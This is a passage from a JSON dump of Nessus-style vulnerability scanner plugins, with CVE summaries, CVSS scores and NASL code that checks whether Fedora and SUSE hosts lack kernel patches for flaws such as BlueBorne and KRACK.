(ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-7369ea045c\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.12.13-300.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:14:10", "description": "The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.12.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 20, "cvss3": {"score": 8.8, "vector": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-22T00:00:00", "title": "Fedora 25 : kernel (2017-e07d7fb18e) (BlueBorne)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000251", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-09-22T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-E07D7FB18E.NASL", "href": "https://www.tenable.com/plugins/nessus/103394", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-e07d7fb18e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103394);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n script_xref(name:\"FEDORA\", value:\"2017-e07d7fb18e\");\n\n script_name(english:\"Fedora 25 : kernel (2017-e07d7fb18e) (BlueBorne)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.12.13 stable kernel update contains a number of important fixes\nacross the tree.\n\n----\n\nThe 4.12.12 stable kernel update contains a number of important fixes\nacross the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-e07d7fb18e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000251\", \"CVE-2017-12153\", \"CVE-2017-12154\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-e07d7fb18e\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.12.13-200.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:26:50", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bsc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1056061 1063479 1063667 1063671).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15265: Use-after-free vulnerability in the\n Linux kernel before 4.14-rc5 allowed local users to have\n unspecified impact via vectors related to /dev/snd/seq\n (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 36, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2017-10-26T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2847-1) (KRACK)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-14106", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-12154"], "modified": "2017-10-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-2847-1.NASL", "href": "https://www.tenable.com/plugins/nessus/104171", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2847-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104171);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-11472\", \"CVE-2017-12134\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-13080\", \"CVE-2017-14051\", \"CVE-2017-14106\", \"CVE-2017-14489\", \"CVE-2017-15265\", \"CVE-2017-15649\", \"CVE-2017-6346\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:2847-1) (KRACK)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to 4.4.92 to\nreceive various security and bugfixes. The following security bugs\nwere fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did\n not flush the operand cache and causes a kernel stack\n dump, which allowed local users to obtain sensitive\n information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a\n crafted ACPI table (bnc#1049580).\n\n - CVE-2017-12134: The xen_biovec_phys_mergeable function\n in drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bsc#1053919).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2)\n allowed reinstallation of the Group Temporal Key (GTK)\n during the group key handshake, allowing an attacker\n within radio range to replay frames from access points\n to clients (bnc#1056061 1063479 1063667 1063671).\n\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash) by leveraging root access\n (bnc#1056588).\n\n - CVE-2017-14106: The tcp_disconnect function in\n net/ipv4/tcp.c in the Linux kernel allowed local users\n to cause a denial of service (__tcp_select_window\n divide-by-zero error and system crash) by triggering a\n disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15265: Use-after-free vulnerability in the\n Linux kernel before 4.14-rc5 allowed local users to have\n unspecified impact via vectors related to /dev/snd/seq\n (bnc#1062520).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1004527\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1005781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015342\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1015343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024346\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1032150\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1035479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037890\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046529\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048228\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048356\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048912\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052093\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052888\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053802\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054082\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056230\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056596\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056849\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056982\"\n );\n script_set_attribute(\n 